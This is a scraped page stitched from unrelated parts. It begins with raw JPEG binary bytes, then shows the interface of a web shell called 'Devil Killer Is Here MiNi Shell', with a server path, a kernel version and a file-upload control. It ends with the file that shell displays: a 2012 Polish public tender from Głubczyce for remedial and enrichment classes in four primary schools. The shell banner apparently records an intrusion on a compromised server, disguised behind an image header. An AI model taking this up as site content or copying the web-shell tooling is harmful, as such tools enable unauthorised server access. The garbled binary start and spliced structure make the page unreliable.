JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20121017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20121017/403830-N-2012.html

<p class="kh_header"><b>Głubczyce: Zakup usług edukacyjnych na potrzeby szkół podstawowych w ramach projektu   Indywidualizacja  nauczania w kl. I-III w szkołach podstawowych Gminy Głubczyce</b><br>
<b>Numer ogłoszenia: 403830 - 2012; data zamieszczenia: 17.10.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Oświaty Kultury i Sportu , ul. Olimpijska 1, 48-100 Głubczyce, woj. opolskie, tel. 0-77 403 60 33, faks 0-77 403 60 35.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zakup usług edukacyjnych na potrzeby szkół podstawowych w ramach projektu   Indywidualizacja  nauczania w kl. I-III w szkołach podstawowych Gminy Głubczyce.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest: Zakup usług edukacyjnych na potrzeby szkół podstawowych w ramach projektu   Indywidualizacja  nauczania w kl. I-III w szkołach podstawowych Gminy Głubczyce realizowanego w ramach Programu Operacyjnego Kapitał Ludzki na lata 2007-2013 Priorytet IX. Rozwój wykształcenia i kompetencji w regionach. Działanie: 9.1 Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie w systemie oświaty Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych- 80 części.

Realizacja usług edukacyjnych  obejmuje 4 placówki oświatowe, zlokalizowane na terenie Gminy Głubczyce, dla których Gmina Głubczyce jest organem prowadzącym: 

1.	Szkoła Podstawowa nr 1 z Oddziałami Integracyjnymi im. Tadeusza Kościuszki, ul. Dworcowa 2, 48-100 Głubczyce  , 
2.	Szkoła Podstawowa nr 2 im. Janusz Korczaka, ul. Kochanowskiego 2, 48-100 Głubczyce ,
3.	Szkoła Podstawowa przy Zespole Szkół im. Jana Pawła II w Pietrowicach, 48-100 Głubczyce,
4.	Szkoła Podstawowa przy Zespole Szkół im Weteranów II Wojny Światowej  w Lisięcicach, ul. Szkolna 5, 48-100 Głubczyce,

 Zakres usługi edukacyjnej obejmuje w szczególności:
1.	Opracowanie na podstawie dokumentów udostępnionych przez szkołę programu zajęć dodatkowych , dostosowanego do zdiagnozowanych  potrzeb uczniów i uwzględniający indywidualizację pracy z dzieckiem oraz treściami  zawartymi  w podstawie programowej zamieszczonej w rozporządzeniu Ministra Edukacji Narodowej z dnia 23 grudnia 2008 r. w sprawie podstawy programowej wychowania przedszkolnego oraz kształcenia ogólnego w poszczególnych typach szkół (Dz. U. z dnia 15 stycznia 2009r. nr 4, poz. 17).
2.	Organizację i przeprowadzenie zaplanowanych godzin zajęć dodatkowych wspierających indywidualizację procesu nauczania, w terminie nie późniejszym niż do 28 czerwca 2013.
3.	Dokumentowanie prowadzonych zajęć i  prowadzenie innej  dokumentacji wymaganej podczas realizacji projektu.
4.	Monitorowanie przebiegu realizacji projektu oraz frekwencji uczestników.
5.	Opracowanie harmonogramu  odpowiednich zajęć w porozumieniu z Koordynatorem projektu i  Dyrektorem danej szkoły. 
6.	Przeprowadzenie indywidualnych diagnoz uczniów na zakończenie realizacji zajęć.
7.	Przygotowanie sprawozdania z realizacji zajęć.
8.	Udział w szkoleniu GENDER. 

Zamawiający w  niniejszym  postępowaniu  dopuszcza  możliwość składania  ofert
częściowych na wykonanie zamówienia wg poniższego podziału:

Wykaz zajęć dodatkowych  do realizacji w szkołach podstawowych w ramach projektu   Indywidualizacja  nauczania w kl. I-III w szkołach podstawowych Gminy Głubczyce

I. Zajęcia dodatkowe dla uczniów mających trudności w opanowaniu wymagań edukacyjnych

1. Zajęcia dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także za-grożonych ryzykiem dysleksji 398 godzin w tym:
Szkoła Podstawowa nr 2 w Głubczycach - 4 grupy po 32 godziny tj. 128 godzin do realizacji  w tym 48 godzin w roku 2012 a 80 godzin w roku 2013.
Szkoła Podstawowa nr 1 w Głubczycach - 4 grupy po 30 godzin tj. 120 godzin do realizacji w tym 48 godzin w roku 2012 a 72 godziny w roku 2013.
Szkoła Podstawowa w Pietrowicach - 2 grupy po 30 godzin tj. 60 godzin do realizacji w tym  24 godziny w roku 2012 a 36 godzin w roku 2013.
Szkoła Podstawowa w Lisięcicach - 3 grupy po 30 godzin tj. 90 godzin do realizacji w tym  36 godzin w roku 2012 a 54 godziny w roku 2013.

Podział na części
Część 1 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 2 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 3 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 4 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 5 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 6 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 7 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 8 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 9 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 10 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 11 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Lisięcicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 12 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Lisięcicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 13 - Przeprowadzenie zajęć dla dzieci ze specyficznymi  trudnościami w czytaniu i pisaniu , w tym także zagrożonych ryzykiem dysleksji w Szkole Podstawowej w Lisięcicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.

2. Zajęcia dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych - 432 go-dziny w tym:

Szkoła Podstawowa nr 2 w Głubczycach - 6 grupy po 32 godziny tj. 192 godziny do realizacji w tym 72 godziny w roku 2012 a 120 godzin w roku 2013.
Szkoła Podstawowa nr 1 w Głubczycach - 4 grupy po 30 godziny tj. 120 godzin do realizacji  w tym 48 godzin w roku 2012 a 72 godziny w roku 2013.
Szkoła Podstawowa w Pietrowicach - 2 grupy po 30 godziny tj. 60 godzin do realizacji  w tym 24 godziny w roku 2012 a 36 godzin w roku 2013.
Szkoła Podstawowa w Lisięcicach - 2 grupy po 30 godziny tj. 60 godzin do realizacji  w tym 24 godziny w roku 2012 a 36 godziny w roku 2013.

Podział na części
Część 14 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godziny w roku 2013.
Część 15 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 16 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 17 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 18 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 19 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 20 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 21 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 22 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 24 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 25 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 26 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 27 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej w Lisięcicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 28 - Przeprowadzenie zajęć dla dzieci  z trudnościami w zdobywaniu umiejętności  matematycznych w Szkole Podstawowej w Lisięcicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.

3. Zajęcia logopedyczne dla dzieci z zaburzeniami rozwoju mowy - 246 godzin w tym:

Szkoła Podstawowa nr 2 w Głubczycach - 3 grupy po 32 godziny tj. 96 godzin do realizacji  w tym 36 godzin w roku 2012 a 60 godzin w roku 2013.
Szkoła Podstawowa w Pietrowicach - 2 grupy po 30 godziny tj. 60 godzin do realizacji w tym 24 godziny w roku 2012 a 36 godzin w roku 2013.
Szkoła Podstawowa w Lisięcicach - 3 grupy po 30 godziny tj. 90 godzin do realizacji w tym 36 godzin w roku 2012 a 54 godziny w roku 2013.

Podział na części
Część 29 - Przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 30 - Przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 31 - Przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 32 - Przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 33 - Przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 34 - Przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej w Lisięcicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 35 - Przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej w Lisięcicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 36 - Przeprowadzenie zajęć logopedycznych dla dzieci z zaburzeniami rozwoju mowy w Szkole Podstawowej w Lisięcicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.

4. Gimnastyka korekcyjna dla dzieci z wadami postawy - 278 godzin w tym:

Szkoła Podstawowa nr 2 w Głubczycach - 2 grupy po 32 godziny tj. 64 godzin do realizacji w tym  24 godziny w roku 2012 a 40 godzin w roku 2013.
Szkoła Podstawowa nr 1 w Głubczycach - 3 grupy po 30 godziny tj. 90 godzin  do realizacji  w tym 36 godzin w roku 2012 a 54 godziny w roku 2013.
Szkoła Podstawowa w Pietrowicach - 2 grupy po 30 godziny tj. 60 godzin do realizacji w tym 24 godziny w roku 2012 a 36 godzin w roku 2013.
Szkoła Podstawowa w Lisięcicach - 2 grupy po 32 godziny tj. 64 godzin do realizacji w tym  24 godziny w roku 2012 a 40 godziny w roku 2013.
Podział na części
Część 37 - Przeprowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 38 - Przeprowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 39 - Przeprowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami posta?wy w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 40 - Przeprowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 41 - Przeprowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 42 - Przeprowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 44 - Przeprowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w Szkole Podstawowej w Pietrowicach - 30 godzin do realizacji w tym 12 godzin w roku 2012 a 18 godzin w roku 2013.
Część 45 - Przeprowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w Szkole Podstawowej w Lisięcicach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 46 - Przeprowadzenie zajęć z gimnastyki korekcyjnej dla dzieci z wadami postawy w Szkole Podstawowej w Lisięcicach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.

5. Specjalistyczne zajęcia terapeutyczne - hipoterapia  dla dzieci  niepełnosprawnych. Zajęcia hipoterapii dla ucznia ze sprzężonymi  zaburzeniami  rozwojowymi - 30 godzin w tym:

 Szkoła Podstawowa nr 1 w Głubczycach - 1 uczeń 30 godzin do realizacji w tym  10 godzin w ro-ku 2012 a 20 godzin w roku 2013.

Część 47 - Przeprowadzenie specjalistycznych zajęć terapeutycznych dla dzieci niepełnosprawnych - hipoterapia  w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 10 godzin w roku 2012 a 20 godzin w roku 2013.

6. Zajęcia rewalidacyjne dla ucznia  który wymaga zgodnie z orzeczeniem  PPP takiej pomocy - 64 godziny w tym:

Szkoła Podstawowa nr 2 w Głubczycach - 1 uczeń 64 godzin do realizacji w tym 24 godziny w roku 2012 a 40 godzin w roku 2013.
Część 48 - Przeprowadzenie zajęć rewalidacyjne dla 1 ucz. który wymaga takiej pomocy zgodnie z orzeczeniem PPP w Szkole Podstawowej nr 2 w Głubczycach  - 64 godziny do realizacji w tym 24 godzin w roku 2012 a 40 godzin w roku 2013.

II. Zajęcia rozwijające zainteresowania uczniów wybitnie szczególnie uzdolnionych 

1. Zajęcia matematyczno-przyrodnicze - 220 godzin w tym:                    

Szkoła Podstawowa nr 2 w Głubczycach - 3 grupy po 32 godziny tj. 96 godzin do realizacji  w tym 36 godzin w roku 2012 a 60 godzin w roku 2013.
Szkoła Podstawowa nr 1 w Głubczycach - 2 grupy po 30 godziny tj. 60 godzin do realizacji  w tym 20 godzin w roku 2012 a 40 godzin w roku 2013.
Szkoła Podstawowa w Lisięcicach - 2 grupy po 32 godziny tj. 64 godzin do realizacji w tym 24 godziny w roku 2012 a 40 godziny w roku 2013.

Podział na części
Część 49 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w naukach matematyczno-przyrodniczych w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 50 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w naukach matematyczno-przyrodniczych w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 51 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w naukach matematyczno-przyrodniczych w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 52 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w naukach matematyczno-przyrodniczych w Szkole Podstawowej nr 1 w Głubczycach - 30 godzin do realizacji w tym 10 godzin w roku 2012 a 20 godzin w roku 2013.
Część 53 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w naukach matematyczno-przyrodniczych w Szkole Podstawowej nr 1 w łubczycach - 30 godzin do realizacji w tym 10 godzin w roku 2012 a 20 godzin w roku 2013.
Część 54 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w naukach matematyczno-przyrodniczych w Szkole Podstawowej w Lisięcicach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.
Część 55 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w naukach matematyczno-przyrodniczych w Szkole Podstawowej w Lisięcicach - 32 godziny do realizacji w tym 12 godzin w roku 2012 a 20 godzin w roku 2013.

2. Rozwijające zdolności posługiwania się  z językiem  obcym (j. angielski  i j. niemiecki) - 312 godzin w tym: 
     
Szkoła Podstawowa nr 2 w Głubczycach - język angielski 4 grupy po 32 godziny tj. 128 godzin do realizacji w tym 48 godzin w roku 2012 a 80 godzin w roku 2013.
Szkoła Podstawowa w Pietrowicach - język niemiecki 4 grupy po 30 godziny tj. 120 godzin  do realizacji  w tym 24 godziny w roku 2012 a 36 godzin w roku 2013.
Szkoła Podstawowa w Lisięcicach - język angielski 2 grupy po 32 godziny tj. 64 godzin do realizacji w tym 24 godziny w roku 2012 a 40 godziny w roku 2013.

Podział na części
Część 56 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w posługiwaniu się językiem obcym - język angielski w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godziny w roku 2012 a 20 godzin w roku 2013.
Część 57 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w posługiwaniu się językiem obcym - język angielski w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godziny w roku 2012 a 20 godzin w roku 2013.
Część 58 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w posługiwaniu się językiem obcym - język angielski w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godziny w roku 2012 a 20 godzin w roku 2013.
Część 59 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w posługiwaniu się językiem obcym - język angielski w Szkole Podstawowej nr 2 w Głubczycach - 32 godziny do realizacji w tym 12 godziny w roku 2012 a 20 godzin w roku 2013.
Część 60 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w posługiwaniu się językiem obcym - język angielski w Szkole Podstawowej w Lisięcicach - 32 godziny do realizacji w tym 12 godziny w roku 2012 a 20 godzin w roku 2013.
Część 61 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w posługiwaniu się językiem obcym - język angielski w Szkole Podstawowej w Lisięcicach - 32 godziny do realizacji w tym 12 godziny w roku 2012 a 20 godzin w roku 2013.
Część 62 - Przeprowadzenie zajęć rozwijających zainteresowania uczniów wybitnie szczególnie uzdolnionych w posługiwaniu się językiem obcym - język niemiecki w Szkole Podstawowej w Pietrowicach  - 30 godziny do realizacji w tym 10 godziny w roku 2012 a 20 godzin w roku 2013.
